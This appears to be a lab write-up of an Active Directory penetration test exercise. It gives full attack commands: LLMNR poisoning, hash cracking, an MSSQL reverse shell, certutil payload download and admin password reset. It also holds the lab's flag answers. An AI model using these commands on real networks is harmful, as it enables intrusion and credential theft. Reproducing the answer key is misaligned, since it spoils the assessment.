AD Enumeration & Attacks - Skills Assessment Part II

The Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using xfreerdp as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Assessment Scope

The following IPs, hosts, and domains make up the scope of the assessment.

In Scope For Assessment

Range/Domain                    Description
------------                    -----------
INLANEFREIGHT.LOCAL             Customer domain, including AD and web services.
LOGISTICS.INLANEFREIGHT.LOCAL   Customer subdomain.
FREIGHTLOGISTICS.LOCAL          Subsidiary company owned by Inlanefreight. External forest trust with INLANEFREIGHT.LOCAL.
172.16.5.0/23                   In-scope internal subnet.

Write Up

We first connect via SSH to our Parrot VM in the internal network. Once in, we can begin looking for a foothold. We start by running Responder and seeing if we can get any hashes back from a poisoned request:

sudo responder -I ens224 -dwPv

After 5 minutes we are getting hashes back, but we can't see them:

[*] [LLMNR]  Poisoned answer sent to 172.16.7.3 for name INLANEFRIGHT
[*] Skipping previously captured hash for INLANEFREIGHT\AB920

We can fix this by adding -v to our command. We run it again and get back a proper hash this time:

[SMB] NTLMv2-SSP Client   : 172.16.7.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\AB920
[SMB] NTLMv2-SSP Hash     : AB920::INLANEFREIGHT:15293b26b356bd0e...

We can now save the hash locally and pass it to Hashcat (mode 5600, NetNTLMv2) to try to crack it:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt.gz

We got a match: weasal
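To make clear what was actually captured above, here is an added example (not part of the original write-up) that parses a Responder line in the hashcat -m 5600 format and decodes the NTLMv2 blob it carries: the client's timestamp and the name of the server the client believed it was talking to, both useful when correlating a capture with DC logs. The sample line is constructed; only the server challenge 15293b26b356bd0e comes from the page.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# AV_PAIR ids (MS-NLMP 2.2.2.1) that name the server the client believed it was authenticating to
AV_NAMES = {1: "nb_computer", 2: "nb_domain", 3: "dns_computer", 4: "dns_domain"}


def decode_av_pairs(data: bytes) -> dict:
    """Walk the AV_PAIR list (id, length, UTF-16LE value) until the MsvAvEOL terminator."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:
            break
        if av_id in AV_NAMES:
            pairs[AV_NAMES[av_id]] = data[pos:pos + av_len].decode("utf-16-le")
        pos += av_len
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat -m 5600 line (USER::DOMAIN:challenge:NTProofStr:blob) and decode the blob."""
    user, sep, rest = line.strip().partition("::")
    if not sep:
        raise ValueError("not a NetNTLMv2 line")
    domain, challenge, proof, blob_hex = rest.split(":", 3)
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("bad server challenge or NTProofStr length")
    blob = bytes.fromhex(blob_hex)
    # Blob layout: sig(4) reserved(4) FILETIME(8) client challenge(8) reserved(4) AV_PAIRs ...
    sig, _reserved, filetime = struct.unpack_from("<IIQ", blob, 0)
    if sig != 0x101:
        raise ValueError("bad blob signature")
    return {"user": user, "domain": domain, "server_challenge": challenge,
            "client_time": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
            "target": decode_av_pairs(blob[28:])}


def build_sample_line(when: datetime, target: str) -> str:
    """Constructed capture in Responder's format; only the server challenge is taken from the write-up."""
    filetime = ((when - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    av_pairs = b"".join(struct.pack("<HH", i, 2 * len(v)) + v.encode("utf-16-le")
                        for i, v in ((1, target), (2, "INLANEFREIGHT")))
    blob = struct.pack("<IIQ", 0x101, 0, filetime) + b"\x11" * 8 + b"\0" * 4 + av_pairs + b"\0" * 8
    return "AB920::INLANEFREIGHT:15293b26b356bd0e:" + "ab" * 16 + ":" + blob.hex()


SAMPLE_LINE = build_sample_line(datetime(2024, 1, 1, tzinfo=timezone.utc), "MS01")
```

The decoded client time and target name tell a defender when the victim authenticated and which (poisoned) name it was answering, which is what to look for in the DC's logon events.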

Now is also a good time to do a ping sweep to discover any other hosts on the network:

fping -asgq 172.16.7.0/24

172.16.7.3

172.16.7.50

172.16.7.60

172.16.7.240

We see there are four hosts in total, so we can assume each represents a forest or a domain controller that we might be able to connect to.

Let's pass these hosts to nmap to get more information: open ports, OS version (outdated, hopefully), etc.

From our scan of 172.16.7.50 we can see this host is MS01.

I tried a few methods like psexec, wmiexec and CrackMapExec but could not connect with them. Eventually I tried evil-winrm and managed to log in and take the flag:

evil-winrm -u AB920 -i 172.16.7.50 -p weasal

Our next step is to build a target user list to find weak passwords. I thought password spraying would be a good way to catch any low-hanging fruit and enable further enumeration of the domain.

After trying, I realised I needed to get the list of users from MS01 by logging into it. After some time struggling, I got a pivot working with SSH dynamic port forwarding:

ssh -D 9050 htb-student@10.129.238.22   (run on our attack machine)

Now I could run xfreerdp through proxychains:

proxychains xfreerdp /v:172.16.7.50 /u:AB920 /p:weasal /drive:share,/home/htb-ac-795544

I next copied PowerView and Kerbrute over to the Windows machine.

I then loaded PowerView:

PS C:\Users\AB920\Desktop> Import-Module .\PowerView.ps1
PS C:\Users\AB920\Desktop> Set-ExecutionPolicy Bypass -Scope Process

And then ran the following to enumerate users in the domain:

Get-DomainUser * | Select-Object -ExpandProperty samaccountname | ForEach-Object {$_.TrimEnd()} | Set-Content adusers.txt

PS C:\Users\AB920\Desktop> Get-Content .\adusers.txt | select -First 10

Now we could use password spraying to guess any easy passwords.

We got a hit: BR086@INLANEFREIGHT.LOCAL:Welcome1

Our next task was to find a config file. I tried Snaffler but couldn't find anything useful.

I then realised I was still the old user and needed to create a new PowerShell session as the newly found user:

runas /netonly /user:INLANEFREIGHT\bro86 powershell

.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s data

It still didn't work for me, so I ended up having to look it up...

netdb:D@ta_bAse_adm1n!

Now it was time to connect to the DB:

mssqlclient.py -p 1433 netdb:D@ta_bAse_adm1n\!@172.16.7.60

We then enabled xp_cmdshell so we could execute OS commands.

After trying to dump the file we needed, I realised we needed admin privileges, so I decided to see if I could dump hashes from the DB.

We started Responder from the SSH session:

sudo responder -I ens224

Then, on the shell connected to the DB, we ran EXEC master..xp_dirtree '\\ATTACKING-IP\share' and Responder successfully captured a hash for the user SQL01!

The hash didn't help as there was no RDP instance, and trying to connect with CME and MSSQL didn't work either.

So I pivoted and took a different approach: a reverse shell from the MSSQL instance.

xp_cmdshell powershell -e ...

We then started a listener on the SSH instance to catch the shell:

nc -lnvp 9001

This worked, but I was limited: I could not see inside the Administrator directory, so I needed to elevate my privileges on the system.

I decided to try PrintSpoofer, so the first task was uploading it to the system; fortunately certutil came in clutch:

xp_cmdshell certutil.exe -urlcache -split -f "http://172.16.7.240:8080/PrintSpoofer.exe" C:\Temp\PrintSpoofer.exe

With PrintSpoofer on the system we could run the following to change the admin account password:

xp_cmdshell C:\Windows\Temp\PrintSpoofer.exe -c "net user administrator Welcome1"

Now it was time to get the flag. After another unsuccessful attempt at RDP, I tried listing the SMB shares and found the flag:

smbclient -U administrator%Welcome1 -L //172.16.7.60

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC

smbclient -U administrator%Welcome1 //172.16.7.60/C$

...

smb: \Users\Administrator\Desktop> get flag.txt

We managed to find our next user and password with:

sudo crackmapexec smb 172.16.7.60 -u administrator -p Welcome1 --local-auth --lsa
mssqlsvc:Sup3rS3cur3maY5ql$3rverE

Once in, we can grab the flag for the next question:

proxychains xfreerdp /v:172.16.7.50 /u:mssqlsvc /p:'Sup3rS3cur3maY5ql$3rverE' /drive:share,/home/htb-ac-795544/

Next we need to search for a new user and their creds.

I tried to use PowerShell, but it seemed like Windows was blocking it, so I ended up running:

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass 
Import-Module .\PowerView.ps1

This bypassed the blocking and PowerView worked!

After trying and failing with PowerView, I got Inveigh onto the Windows instance and managed to capture a hash for the user ct059.

Running it through Hashcat gave us the password charlie1.

We then connected as this user:

proxychains xfreerdp /v:172.16.7.50 /u:ct059 /p:'charlie1' /drive:share,/home/htb-ac-795544/

Once in, we uploaded SharpHound and BloodHound to the system and then ran SharpHound to collect information:

.\SharpHound.exe

and then passed the collected data to BloodHound:

.\BloodHound.exe

From this we could work out how to proceed next.

I had to use a different version of PowerView.

Questions

Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

AB920

What is this user's cleartext password?

weasal

Submit the contents of the C:\flag.txt file on MS01.

aud1t_gr0up_m3mbersh1ps!

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

BRO86

What is this user's password?

Welcome1

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

D@ta_bAse_adm1n!

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.


Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.


Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?


Crack this user's password hash and submit the cleartext password as your answer.


Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.


Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.
